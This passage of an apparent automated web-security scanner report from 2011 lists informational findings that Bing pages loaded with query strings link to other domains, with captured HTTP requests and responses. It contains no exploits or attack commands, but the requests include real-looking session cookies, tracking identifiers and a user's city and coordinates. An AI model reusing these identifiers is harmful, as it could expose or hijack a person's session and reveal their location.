<a target="_new" href="http://rd.a9.com/srv/redirect/?info=AIys9q0A9Y2eDUnFVWfBcWIckhsY7fiBXXF9Ka18wumsqXQ7JdEWL4eUx8gmc2rTqIRM0YxtcigQnzi4k2RfVzJ5IzUf12RhdYyqOb6l-BhuKt5TFYERVKQdEljJjd2p9jcJFqqFEcxuWmANRDeXdMEji9hNCaIHIcKjLaJdUT1X0G2MfRwGDm.c25G4v9-QCslHSShZRG-I9j61Ew1d03MFsFRsvlufLVRvp8eMUoVF3JdByDZdlMehVJo0Uq4pkZI24niChfWbDGAH1WJvAwBHwpsWxfjbiN1PXB.zEMPBr5G-vEomAY.vBvEVKD9fyiBl2dYmWij9fC1tQGtyl6yR9hPmg3skh8EcDiCzJM9lqb2qGfwohPYagQzrk2sM2eqaVEihMvMr9aYu0CUiICEaMXLEGErYnuxtbaMmX5bm9QYdmgZC5tanJt.m6dFDcl2VYhZ600.L0nJ2i8S7dyaRT-3d3EcSc6d8pDVZVWtC&awt=1&s=" rel="nofollow"><span class="Clickriver_swSprite Clickriver_s_extLink">
...[SNIP]...
<div class="SponsoredLinkDescription">
  <a target="_new" href="http://rd.a9.com/srv/redirect/?info=AIys9q0A9Y2eDUnFVWfBcWIckhsY7fiBXXF9Ka18wumsqXQ7JdEWL4eUx8gmc2rTqIRM0YxtcigQnzi4k2RfVzJ5IzUf12RhdYyqOb6l-BhuKt5TFYERVKQdEljJjd2p9jcJFqqFEcxuWmANRDeXdMEji9hNCaIHIcKjLaJdUT1X0G2MfRwGDm.c25G4v9-QCslHSShZRG-I9j61Ew1d03MFsFRsvlufLVRvp8eMUoVF3JdByDZdlMehVJo0Uq4pkZI24niChfWbDGAH1WJvAwBHwpsWxfjbiN1PXB.zEMPBr5G-vEomAY.vBvEVKD9fyiBl2dYmWij9fC1tQGtyl6yR9hPmg3skh8EcDiCzJM9lqb2qGfwohPYagQzrk2sM2eqaVEihMvMr9aYu0CUiICEaMXLEGErYnuxtbaMmX5bm9QYdmgZC5tanJt.m6dFDcl2VYhZ600.L0nJ2i8S7dyaRT-3d3EcSc6d8pDVZVWtC&awt=1&s=" rel="nofollow" class="SponsoredLinkDescriptionUrlLink">intersystems.com/Cache</a>
...[SNIP]...
<span>  <a target="_new" href="http://rd.a9.com/srv/redirect/?info=ALAUlv5bNpIbYQe3J19.jjAy9sNdZoAj8rNVvDHP8wVae6uI3sBadRGeUZN4zynEbk.eekvc9T4fMNnuLnYJb-wNoGgEjY75VQ0pQH43qk.bbc7FMJNdnhnJ0kLg95E.Du2ylJH.yyolih8Uii4ax9EZWc.oQgEOAP2AG48fVD2FtMEmkPTlCEmPARo4ffV3I6HSTz2Pf5ALmuzQPorvoZTMgxGDSZRn4yxw9Fts4fiIKnefj9t5If0qxlGModWxgsKxPtFFrH8HF.wgkjeRJp-aVvRtEH28ITundIndIvKlvJqRA2xyBxXapQlmVTCzFG4TJlLN-..Seyn1wUTtm0YHXWjnMQwcAbOz25QOS7TDNgKY99Bn-NfwVd4Ykt54hQ3OhOD4KxtQxXVq1f1UOWEevg14R1ki5nbPObDr4R9YyCjRJIDxHhkr7hQdPeNmJS3toNF1xTOgPHNOMUUwIjWoQd6200BkpsDN3h5.3VYInIF0AWKt9i8IYvhdEZKQvg__&awt=1&s=" rel="nofollow"><b>
...[SNIP]...
</a>
<a target="_new" href="http://rd.a9.com/srv/redirect/?info=ALAUlv5bNpIbYQe3J19.jjAy9sNdZoAj8rNVvDHP8wVae6uI3sBadRGeUZN4zynEbk.eekvc9T4fMNnuLnYJb-wNoGgEjY75VQ0pQH43qk.bbc7FMJNdnhnJ0kLg95E.Du2ylJH.yyolih8Uii4ax9EZWc.oQgEOAP2AG48fVD2FtMEmkPTlCEmPARo4ffV3I6HSTz2Pf5ALmuzQPorvoZTMgxGDSZRn4yxw9Fts4fiIKnefj9t5If0qxlGModWxgsKxPtFFrH8HF.wgkjeRJp-aVvRtEH28ITundIndIvKlvJqRA2xyBxXapQlmVTCzFG4TJlLN-..Seyn1wUTtm0YHXWjnMQwcAbOz25QOS7TDNgKY99Bn-NfwVd4Ykt54hQ3OhOD4KxtQxXVq1f1UOWEevg14R1ki5nbPObDr4R9YyCjRJIDxHhkr7hQdPeNmJS3toNF1xTOgPHNOMUUwIjWoQd6200BkpsDN3h5.3VYInIF0AWKt9i8IYvhdEZKQvg__&awt=1&s=" rel="nofollow"><span class="Clickriver_swSprite Clickriver_s_extLink">
...[SNIP]...
<div class="SponsoredLinkDescription">
  <a target="_new" href="http://rd.a9.com/srv/redirect/?info=ALAUlv5bNpIbYQe3J19.jjAy9sNdZoAj8rNVvDHP8wVae6uI3sBadRGeUZN4zynEbk.eekvc9T4fMNnuLnYJb-wNoGgEjY75VQ0pQH43qk.bbc7FMJNdnhnJ0kLg95E.Du2ylJH.yyolih8Uii4ax9EZWc.oQgEOAP2AG48fVD2FtMEmkPTlCEmPARo4ffV3I6HSTz2Pf5ALmuzQPorvoZTMgxGDSZRn4yxw9Fts4fiIKnefj9t5If0qxlGModWxgsKxPtFFrH8HF.wgkjeRJp-aVvRtEH28ITundIndIvKlvJqRA2xyBxXapQlmVTCzFG4TJlLN-..Seyn1wUTtm0YHXWjnMQwcAbOz25QOS7TDNgKY99Bn-NfwVd4Ykt54hQ3OhOD4KxtQxXVq1f1UOWEevg14R1ki5nbPObDr4R9YyCjRJIDxHhkr7hQdPeNmJS3toNF1xTOgPHNOMUUwIjWoQd6200BkpsDN3h5.3VYInIF0AWKt9i8IYvhdEZKQvg__&awt=1&s=" rel="nofollow" class="SponsoredLinkDescriptionUrlLink">www.<b>
...[SNIP]...
<span>  <a target="_new" href="http://rd.a9.com/srv/redirect/?info=AA1qj99DKyW8k0G4mJG87w5TPP3pGSgGNTg4jxiwP9PWWq-xETkOGxIniqvYu0f2BPxgowSyGJFHFDiQlx2ejilsjyCbt3UZ4FA9DPuA03gGsbHSV8sredGIE1Db2DdSfkl0aDJEGQ2UtiNuvUuxUtunhKb60IdGJs5Z8BigP6llgHfVJrbyVL2Yx0KpDufUybH9iFQgYipWjhDnJ6rFKyV2egWoTED8a7MChebCnt1iSdghRkcfPoZnhU5HnHJhxRaRQuzbKattoEAjYhGyMx7Nigt3Pw2cxjqy-Ncd3.RE4V3MafVLW2NVl2lN63WA.-yU.HUPQGou82sdudXTEIWGvPxm-R-4lTRNrEdRjSJUF0eK37rFMGzdVGI7ynWN265-m7.hSxUoWbPZVWJzwIKF7t5j6W4Qsd7ewKzgGthFJw8KYoNB1K.BYlJW7X9r1oIPS1MiO5f-KpvzneG4BoL4c0gI7WyQ347QuTVAUvDRYBZeIdiSBtsq03ZGhfzTSs4XtjDVaPgecXT5go6kdU0oZakCYDUCKq7cXHSzoBDAfyTF0qqxnTs_&awt=1&s=" rel="nofollow">Microsoft <b>
...[SNIP]...
</a>
<a target="_new" href="http://rd.a9.com/srv/redirect/?info=AA1qj99DKyW8k0G4mJG87w5TPP3pGSgGNTg4jxiwP9PWWq-xETkOGxIniqvYu0f2BPxgowSyGJFHFDiQlx2ejilsjyCbt3UZ4FA9DPuA03gGsbHSV8sredGIE1Db2DdSfkl0aDJEGQ2UtiNuvUuxUtunhKb60IdGJs5Z8BigP6llgHfVJrbyVL2Yx0KpDufUybH9iFQgYipWjhDnJ6rFKyV2egWoTED8a7MChebCnt1iSdghRkcfPoZnhU5HnHJhxRaRQuzbKattoEAjYhGyMx7Nigt3Pw2cxjqy-Ncd3.RE4V3MafVLW2NVl2lN63WA.-yU.HUPQGou82sdudXTEIWGvPxm-R-4lTRNrEdRjSJUF0eK37rFMGzdVGI7ynWN265-m7.hSxUoWbPZVWJzwIKF7t5j6W4Qsd7ewKzgGthFJw8KYoNB1K.BYlJW7X9r1oIPS1MiO5f-KpvzneG4BoL4c0gI7WyQ347QuTVAUvDRYBZeIdiSBtsq03ZGhfzTSs4XtjDVaPgecXT5go6kdU0oZakCYDUCKq7cXHSzoBDAfyTF0qqxnTs_&awt=1&s=" rel="nofollow"><span class="Clickriver_swSprite Clickriver_s_extLink">
...[SNIP]...
<div class="SponsoredLinkDescription">
  <a target="_new" href="http://rd.a9.com/srv/redirect/?info=AA1qj99DKyW8k0G4mJG87w5TPP3pGSgGNTg4jxiwP9PWWq-xETkOGxIniqvYu0f2BPxgowSyGJFHFDiQlx2ejilsjyCbt3UZ4FA9DPuA03gGsbHSV8sredGIE1Db2DdSfkl0aDJEGQ2UtiNuvUuxUtunhKb60IdGJs5Z8BigP6llgHfVJrbyVL2Yx0KpDufUybH9iFQgYipWjhDnJ6rFKyV2egWoTED8a7MChebCnt1iSdghRkcfPoZnhU5HnHJhxRaRQuzbKattoEAjYhGyMx7Nigt3Pw2cxjqy-Ncd3.RE4V3MafVLW2NVl2lN63WA.-yU.HUPQGou82sdudXTEIWGvPxm-R-4lTRNrEdRjSJUF0eK37rFMGzdVGI7ynWN265-m7.hSxUoWbPZVWJzwIKF7t5j6W4Qsd7ewKzgGthFJw8KYoNB1K.BYlJW7X9r1oIPS1MiO5f-KpvzneG4BoL4c0gI7WyQ347QuTVAUvDRYBZeIdiSBtsq03ZGhfzTSs4XtjDVaPgecXT5go6kdU0oZakCYDUCKq7cXHSzoBDAfyTF0qqxnTs_&awt=1&s=" rel="nofollow" class="SponsoredLinkDescriptionUrlLink">savenkeep.com</a>
...[SNIP]...
<a href="http://www.amazon.com/Silverlight-4-Action-Pete-Brown/dp/1935182374/ref=bxgy_cc_b_img_a"><img src="http://ecx.images-amazon.com/images/I/512qJmTNIXL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS75_.jpg" width="75" alt="Silverlight 4 in Action" id="" height="75" border="0" /></a>
...[SNIP]...
<a href="http://www.amazon.com/Programming-WCF-Services-Mastering-AppFabric/dp/0596805489/ref=bxgy_cc_b_img_b"><img src="http://ecx.images-amazon.com/images/I/41ednsqKVdL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="75" alt="Programming WCF Services: Mastering WCF and the Azure AppFabric Service Bus" id="" height="75" border="0" /></a>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/51vz6WNpVTL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/41QizTXOm1L._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/51lFeW7HogL._SL500_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/51ZBCnP8%2B0L._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/41ednsqKVdL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/512N51%2BQbGL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div style="display: none" class="CustomerPopover_load"><img src="http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loadIndicator-label._V192195535_.gif" width="73" alt="Loading…" height="14" border="0" /></div>
...[SNIP]...
<noscript>
<link type="text/css" rel="stylesheet" href="http://z-ecx.images-amazon.com/images/G/01/x-locale/communities/profile/customer-popover/style-no-js-3._V248984171_.css" />
</noscript>
...[SNIP]...
</div>

<img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/communities/reviews/cfm._V192249942_.gif" width="1" alt="" onload="if (typeof uet == 'function') { uet('cf'); }" height="1" border="0" />

<br />
...[SNIP]...
<div style="display:none;" id="cg-div">
<img onload="if (typeof uet == 'function') { uet('cg'); } window.stageMarkers.stage('amznJQ.criticalFeature', 2);" src="http://g-ecx.images-amazon.com/images/G/01/x-locale/common/transparent-pixel._V192234675_.gif" width="1" alt="" height="1" border="0" /><img onload="if (typeof uet == 'function') { uet('cg'); } window.stageMarkers.stage('amznJQ.criticalFeature', 2);" src="http://ecx.images-amazon.com/images/G/01/x-locale/common/transparent-pixel._V192234675_.gif" width="1" alt="" height="1" border="0" />
</div>
...[SNIP]...
<div class="s9DpEntity" id="s9DpEntity" style="height: 200px;"><img style='padding-left: 130px; padding-top: 20px;' src='http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loadIndicator-large._V192195483_.gif' alt='loading' /><noscript>
...[SNIP]...
<td valign="top" class="faceout"><img src="http://ecx.images-amazon.com/images/I/512qJmTNIXL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS75_.jpg" width="50" alt="Silverlight 4 in Action" height="50" border="0" /></td>
...[SNIP]...
<a href="http://www.amazon.com/Pro-Silverlight-4-Matthew-MacDonald/dp/1430229799/ref=pd_cp_b_1_img" id="pd_cp_b_1_img_1430229799" ><img src="http://ecx.images-amazon.com/images/I/51vz6WNpVTL._SL75_PIsitb-sticker-arrow-st,TopRight,8,-14_OU01_SS50_.jpg" width="50" alt="Pro Silverlight 4 in C#" height="50" border="0" /></a>
...[SNIP]...
<a href="http://www.amazon.com/Silverlight-4-Unleashed-Laurent-Bugnion/dp/0672333368/ref=pd_cp_b_2_img" id="pd_cp_b_2_img_0672333368" ><img src="http://ecx.images-amazon.com/images/I/41QizTXOm1L._SL75_PIsitb-sticker-arrow-st,TopRight,8,-14_OU01_SS50_.jpg" width="50" alt="Silverlight 4 Unleashed" height="50" border="0" /></a>
...[SNIP]...
<a href="http://www.amazon.com/Foundation-Expression-Blend-4-Silverlight/dp/143022973X/ref=pd_cp_b_3_img" id="pd_cp_b_3_img_143022973X" ><img src="http://ecx.images-amazon.com/images/I/51lFeW7HogL._SL75_SS50_.jpg" width="50" alt="Foundation Expression Blend 4 with Silverlight" height="50" border="0" /></a>
...[SNIP]...
<div class="loading_ind" style="text-align: center; width: 100%; display: none;">
<img src="http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loading-large_boxed._V192195297_.gif" width="100" alt="Loading..." height="124" border="0" />
</div>
...[SNIP]...
<div class="loading_ind" style="display:none" width="100%">
<img src="http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loadIndicator-large._V192195480_.gif" style="padding:8px 0px 0px 100px" />
</div>
...[SNIP]...
<div width="100%" style="display: none;" class="loading_ind">
<img style="padding: 8px 0px 0px 100px;" src="http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loading-large_boxed._V192195297_.gif"/>
</div>
...[SNIP]...
<div width="100%" style="display: none;" class="loading_ind">
<img style="padding: 8px 0px 0px 100px;" src="http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loading-large_boxed._V192195297_.gif"/>
</div>
...[SNIP]...
<div style="background-color:#eff7fe;border:1px solid #0f3c6d;padding:10px;text-align:left;" class="small">
<img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/communities/reputation/suggestionbox._V192249929_.gif" width="1" align="left" height="1" border="0" />
<div name="hmdFormDiv" id="hmdFormDiv">
...[SNIP]...
<td>
    <img src="http://g-ecx.images-amazon.com/images/G/01/icons/orange-arrow._V192570247_.gif" width="5" align="absmiddle" height="9" border="0" />
    If you need help or have a question for Customer Service, <a href="/gp/help/customer/display.html/ref=cm_r8n_hmd_contact?ie=UTF8&nodeId=518316">
...[SNIP]...
<td>


                                                               <img src="http://g-ecx.images-amazon.com/images/G/01/icons/orange-arrow._V192570247_.gif" width="5" align="absmiddle" height="9" border="0" /> Would you like to <b>
...[SNIP]...
<td>
    <img src="http://g-ecx.images-amazon.com/images/G/01/icons/orange-arrow._V192570247_.gif" width="5" align="absmiddle" height="9" border="0" />

Is there any other feedback you would like to provide?

    <b>
...[SNIP]...
<a href="/ref=footer_logo/187-0383633-5130955"><img src="http://g-ecx.images-amazon.com/images/G/01/gno/images/general/navAmazonLogoFooter._V192570482_.gif" width="126" alt="amazon.com" height="24" border="0" /></a>
...[SNIP]...
<div class="navFooterLine navFooterLinkLine navFooterPadItemLine">
<a href="http://www.amazon.ca">Canada</a>
<a href="http://www.amazon.cn">China</a>
<a href="http://www.amazon.fr">France</a>
<a href="http://www.amazon.de">Germany</a>
<a href="http://www.amazon.it">Italy</a>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.audible.com">Audible<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.dpreview.com">DPReview<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.endless.com">Endless<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.fabric.com">Fabric<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.imdb.com">IMDb<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.shopbop.com/welcome">Shopbop<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.smallparts.com">Small Parts<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.warehousedeals.com">Warehouse Deals<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.woot.com">Woot<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.zappos.com">Zappos<br/>
...[SNIP]...

22.379. http://www.bing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/

Issue detail

The page was loaded from a URL containing a query string:

http://www.bing.com/?FORM=MSNH14

The response contains the following links to other domains:

http://advertising.microsoft.com/advertise-on-bing
http://g.live.com/9uxp9en-us/ftr1
http://g.redacted/0TO_/enus
http://g.redacted/AIPRIV/en-us
http://go.microsoft.com/fwlink/?LinkId=74170
http://mail.live.com/
http://onlinehelp.microsoft.com/en-US/bing/ff808506.aspx
http://www.discoverbing.com/get/set-bing-as-your-homepage-1?&form=pgbar2
http://www.redacted/
https://feedback.live.com/default.aspx?locale=en-US&productkey=wlsearchweb&P1=dsathome&P2=&P3=0&P4=MSNH14&P5=F741A5D3C8544F77A0B57D8439E7E06E&P6=Dallas%2c+Texas&P7=Original&P8=&P9=32.8%2f-96.787&P10=24902&P11=&P12=&searchtype=Web+Search&optl1=1&backurl=http%3a%2f%2fwww.bing.com%3a80%2f%3fFORM%3dFEEDTU

Request

GET /?FORM=MSNH14 HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Length: 28630
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.redacted/w3c/p3p.xml"
X-UA-Compatible: IE=7
Date: Sun, 30 Jan 2011 16:59:24 GMT
Connection: close
Set-Cookie: _SS=SID=66BC656690CE4D539DE7254734366E80; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 16:59:23 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c8bdc9944b4474ed89a10284b3c1be756; expires=Tue, 29-Jan-2013 16:59:23 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1621019&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 16:59:23 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"><head><meta
...[SNIP]...
<li><a href="http://www.redacted/" onmousedown="return si_T('&ID=SERP,70.1')">MSN</a> | </li><li><a href="http://mail.live.com/" onmousedown="return si_T('&ID=SERP,72.1')">Hotmail</a>
...[SNIP]...
</h3><a href="http://www.discoverbing.com/get/set-bing-as-your-homepage-1?&form=pgbar2" onmousedown="return si_T('&ID=SERP,48.1')">Make Bing your homepage</a>
...[SNIP]...
<li><a href="http://g.live.com/9uxp9en-us/ftr1" onmousedown="return si_T('&ID=SERP,82.1')">© 2011 Microsoft</a>
...[SNIP]...
<li><a href="http://go.microsoft.com/fwlink/?LinkId=74170" onmousedown="return si_T('&ID=SERP,84.1')">Privacy</a> | </li><li><a href="http://g.redacted/0TO_/enus" onmousedown="return si_T('&ID=SERP,86.1')">Legal</a> | </li><li><a href="http://advertising.microsoft.com/advertise-on-bing" onmousedown="return si_T('&ID=SERP,88.1')">Advertise</a>
...[SNIP]...
<li><a href="http://g.redacted/AIPRIV/en-us" target="_blank" onmousedown="return si_T('&ID=SERP,90.1')">About our ads</a>
...[SNIP]...
<li><a href="http://onlinehelp.microsoft.com/en-US/bing/ff808506.aspx" id="sb_help" target="_blank" onmousedown="return si_T('&ID=SERP,92.1')">Help</a> | </li><li><a href="https://feedback.live.com/default.aspx?locale=en-US&productkey=wlsearchweb&P1=dsathome&P2=&P3=0&P4=MSNH14&P5=F741A5D3C8544F77A0B57D8439E7E06E&P6=Dallas%2c+Texas&P7=Original&P8=&P9=32.8%2f-96.787&P10=24902&P11=&P12=&searchtype=Web+Search&optl1=1&backurl=http%3a%2f%2fwww.bing.com%3a80%2f%3fFORM%3dFEEDTU" id="sb_feedback" onmousedown="return si_T('&ID=SERP,94.1')">Tell us what you think</a>
...[SNIP]...

22.380. http://www.bing.com/fd/fb/mulmfg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/fd/fb/mulmfg

Issue detail

The page was loaded from a URL containing a query string:

http://www.bing.com/fd/fb/mulmfg?IG=0cb67a41bf914cccaf15c0039ba2b9e7&IID=FD.1&ru=http%3A%2F%2Fwww.bing.com%2Fvideos%2Fbrowse

The response contains the following links to other domains:

http://go.microsoft.com/fwlink/?LinkID=191371
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296407563&rver=6.0.5286.0&wp=MBI&wreply=http:%2F%2Fwww.bing.com%2FPassport.aspx%3Frequrl%3Dhttp%253a%252f%252fwww.bing.com%252fvideos%252fbrowse&lc=1033&id=264960

Request

GET /fd/fb/mulmfg?IG=0cb67a41bf914cccaf15c0039ba2b9e7&IID=FD.1&ru=http%3A%2F%2Fwww.bing.com%2Fvideos%2Fbrowse HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/videos/browse
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FBB=R=0; SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; _SS=SID=4318D78D50E640FC90E674B1FECFA468&hIm=178; RMS=F=O; MUID=DC63BAA44C3843F38378B4BB213E0A6F; OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; SRCHD=SM=1&MS=1621031&D=1593447&AF=NOFORM; _FP=BDCE=129409675061634862&BDCEH=4B00CE098126B4CE6DFFB8D547F7B893; _UR=OMW=0; _HOP=

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.redacted/w3c/p3p.xml"
Vary: Accept-Encoding
Date: Sun, 30 Jan 2011 17:12:43 GMT
Connection: close
Content-Length: 1438

<li><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296407563&rver=6.0.5286.0&wp=MBI&wreply=http:%2F%2Fwww.bing.com%2FPassport.aspx%3Frequrl%3Dhttp%253a%252f%252fwww.bing.com%252fvideos%252fbrowse&lc=1033&id=264960" onmousedown="return si_T('&ID=FD.FD.1,4.1')"><span id="sw_tliw">
...[SNIP]...
</a> · <a href="http://go.microsoft.com/fwlink/?LinkID=191371" onmousedown="return si_T('&ID=FD.FD.1,9.1')"><span>
...[SNIP]...

22.381. http://www.bing.com/images/results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/images/results.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://www.bing.com/images/results.aspx?q=

The response contains the following links to other domains:

http://advertising.microsoft.com/advertise-on-bing
http://feedback.live.com/default.aspx?productkey=wlsearchimage&backurl=/images/search.aspx?q=
http://g.live.com/9uxp9en-us/ftr1
http://g.redacted/0TO_/enus
http://g.redacted/AIPRIV/en-us
http://go.microsoft.com/fwlink/?LinkId=74170
http://mail.live.com/
http://onlinehelp.microsoft.com/en-US/bing/ff808550.aspx
http://www.redacted/

Request

GET /images/results.aspx?q= HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 62488
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.redacted/w3c/p3p.xml"
X-UA-Compatible: IE=7
Date: Sat, 29 Jan 2011 23:52:16 GMT
Connection: close
Set-Cookie: IMGSCHUSR=scratchpad=0&details=1&BE=1; expires=Mon, 28-Jan-2013 23:52:16 GMT; domain=.bing.com; path=/images
Set-Cookie: _SS=SID=ECC83C7DA0034AEABA343EF0044328D4; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Mon, 28-Jan-2013 23:52:16 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c8116a169827248a2a4de6df0d9741c2b; expires=Mon, 28-Jan-2013 23:52:16 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1619992&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:52:16 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"><head><meta
...[SNIP]...
<li><a href="http://www.redacted/" onmousedown="return si_T('&ID=FD,61.1')">MSN</a></li><li><a href="http://mail.live.com/" onmousedown="return si_T('&ID=FD,63.1')">Hotmail</a>
...[SNIP]...
<li><a href="http://g.live.com/9uxp9en-us/ftr1" onmousedown="return si_T('&ID=FD,74.1')">© 2011 Microsoft</a>
...[SNIP]...
<li><a href="http://go.microsoft.com/fwlink/?LinkId=74170" onmousedown="return si_T('&ID=FD,76.1')">Privacy</a> | </li><li><a href="http://g.redacted/0TO_/enus" onmousedown="return si_T('&ID=FD,78.1')">Legal</a> | </li><li><a href="http://advertising.microsoft.com/advertise-on-bing" onmousedown="return si_T('&ID=FD,80.1')">Advertise</a>
...[SNIP]...
<li><a href="http://g.redacted/AIPRIV/en-us" target="_blank" onmousedown="return si_T('&ID=FD,82.1')">About our ads</a>
...[SNIP]...
<li><a href="http://onlinehelp.microsoft.com/en-US/bing/ff808550.aspx" id="sb_help" target="_blank" onmousedown="return si_T('&ID=FD,84.1')">Help</a> | </li><li><a href="http://feedback.live.com/default.aspx?productkey=wlsearchimage&backurl=/images/search.aspx?q=" id="sb_feedback" onmousedown="return si_T('&ID=FD,86.1')">Tell us what you think</a>
...[SNIP]...

22.382. http://www.bing.com/local/ypdefault.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/local/ypdefault.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://www.bing.com/local/ypdefault.aspx?cobrand=1

The response contains the following links to other domains:

http://advertising.microsoft.com/advertise-on-bing
http://g.live.com/9uxp9en-us/ftr1
http://g.redacted/0TO_/enus
http://g.redacted/AIPRIV/en-us
http://go.microsoft.com/fwlink/?LinkId=74170
http://mail.live.com/
http://onlinehelp.microsoft.com/en-us/bing/ff808582.aspx
